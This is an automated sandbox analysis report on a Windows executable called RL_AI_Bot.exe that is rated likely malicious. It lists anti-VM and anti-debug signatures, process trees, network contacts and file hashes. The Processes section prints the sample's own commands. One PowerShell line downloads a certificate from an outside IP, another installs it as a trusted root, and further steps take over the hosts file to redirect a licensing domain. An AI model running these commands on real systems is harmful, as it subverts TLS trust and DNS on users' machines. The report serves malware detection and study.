Malware Analysis Report

2024-12-07 14:56

Sample ID 241005-amd41ayeqe
Target RL_AI_Bot.exe
SHA256 c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0
Tags
defense_evasion discovery evasion execution exploit themida trojan
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0

Threat Level: Likely malicious

The file RL_AI_Bot.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit themida trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Possible privilege escalation attempt

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Executes dropped EXE

Themida packer

Modifies file permissions

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Hide Artifacts: Ignore Process Interrupts

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Gathers network information

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-05 00:19

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-05 00:19

Reported

2024-10-05 00:20

Platform

win11-20240802-en

Max time kernel

33s

Max time network

35s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RL_AI.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RL_AI.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RL_AI.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RL_AI.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1004 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe C:\Windows\system32\cmd.exe
PID 1004 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe C:\Windows\system32\cmd.exe
PID 2044 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2044 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4616 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4616 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4616 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4616 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4616 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4616 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4616 wrote to memory of 232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4616 wrote to memory of 4864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4864 wrote to memory of 3632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4864 wrote to memory of 3632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4616 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4616 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2068 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2068 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2068 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2068 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 4616 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1004 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
PID 1004 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
PID 4836 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3020 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3020 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3020 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3020 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3020 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4836 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\RL_AI.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe

"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c @echo off & echo Running fix.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"

C:\Windows\system32\takeown.exe

takeown /F C:\Windows\System32\drivers\etc /R /A

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\etc /grant administrators:F /T

C:\Windows\system32\certutil.exe

certutil -store TrustedRoot

C:\Windows\system32\findstr.exe

findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"

C:\Windows\system32\certutil.exe

certutil -store TrustedRoot

C:\Windows\system32\findstr.exe

findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"

C:\Windows\system32\findstr.exe

findstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Users\Admin\AppData\Local\Temp\RL_AI.exe

C:\Users\Admin\AppData\Local\Temp\RL_AI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto
NL 188.227.107.14:80 188.227.107.14 tcp
US 8.8.8.8:53 14.107.227.188.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
NL 188.227.107.14:443 keyauth.win tcp
N/A 127.0.0.1:49797 tcp
N/A 127.0.0.1:49799 tcp
NL 188.227.107.14:443 keyauth.win tcp
N/A 127.0.0.1:49806 tcp
N/A 127.0.0.1:49808 tcp
N/A 127.0.0.1:49813 tcp
N/A 127.0.0.1:49815 tcp
NL 188.227.107.14:443 keyauth.win tcp
NL 188.227.107.14:443 keyauth.win tcp
N/A 127.0.0.1:49818 tcp
N/A 127.0.0.1:49820 tcp
NL 188.227.107.14:443 keyauth.win tcp
N/A 127.0.0.1:49824 tcp
N/A 127.0.0.1:49826 tcp

Files

C:\Users\Admin\AppData\Local\Temp\autA151.tmp

MD5 898bbb4fac0d31cacf8bd6f0ea1dcd14
SHA1 cbc25afd3e39ec0b030a6148ad44ae882ad063be
SHA256 87f84086ae3ebd38fe6df4c2a90cc2064787c9a863bb279cc278467aa2f0edc9
SHA512 66848d109d566c7f6c273c86b0a8611340e46534a4f028f91091d06900448c95c4093bd987c06a2be4c246ded5c6baa8de3d03049f4cfa49da9b360e6b5a2ec4

C:\Users\Admin\AppData\Local\Temp\fix.bat

MD5 ded50caaa850f5278662834fd32021ae
SHA1 2bd1354b58408585a5ef862838cb97f7ab1f219c
SHA256 9847b9305180be84090dc361c21bfc002223309fbf22a991b5396bf5a5fd79d3
SHA512 d8286d37a412aa73cd97f0a5321825f5bf138e91069477e4dddfbfcc0835723606a692da858b4331d2f127b50d2154d81fd98bd08d0a1d0904b63e07de689620

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0i3atge.wxq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4824-18-0x000001C65FBF0000-0x000001C65FC12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\server.crt

MD5 5663fb32607a5562453a8125a8f812c4
SHA1 764264efe0329df2a961dca0e45efc70878bfed7
SHA256 f6b3ca3c38d3efebe9a1e98f6042807f087688586c93513bae631fe24e1fe81e
SHA512 31b05f2d170b77ca4cfe298e913e0c07a7b5e57fbe4f1296b8b616729564f32fc3f53c6993f51dd50015aba808ae4c59560155119556e76744990cef68ef4b86

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

C:\Windows\System32\drivers\etc\hosts

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

memory/4836-43-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-45-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-47-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-46-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-48-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-51-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-54-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-55-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-57-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp